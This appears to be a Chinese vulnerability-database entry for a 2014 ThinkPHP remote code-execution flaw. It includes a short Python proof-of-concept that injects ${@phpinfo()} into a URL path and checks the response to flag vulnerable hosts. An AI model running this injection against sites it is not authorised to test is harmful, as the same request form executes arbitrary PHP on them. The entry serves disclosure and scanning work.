欢迎致电:4000-600-654服务时间:9:00 - 21:00

ThinkPHP框架代码执行漏洞

漏洞信息

漏洞编号:JDSEC-POC-2014-1128-3233

漏洞名称:ThinkPHP框架代码执行漏洞

提交作者:0x0F

提交日期:2014-11-29 08:45:13

信息来源:http://www.2cto.com/Article/201206/134199.html

漏洞描述

ThinkPHP代码执行漏洞

POC详情

#coding=utf-8

import requests


def run(target):
    "thinkphp code exec"
    results = []
    url = "http://" + target + "/index.php/module/aciton/param1/${@phpinfo()}"
    try:
        r = requests.get(url, timeout=5)
    except Exception:
        pass
    else:
        r.close()
        if r.status_code == 200 and "<title>phpinfo()</title>" in r.text:
            results.append(url)

    return results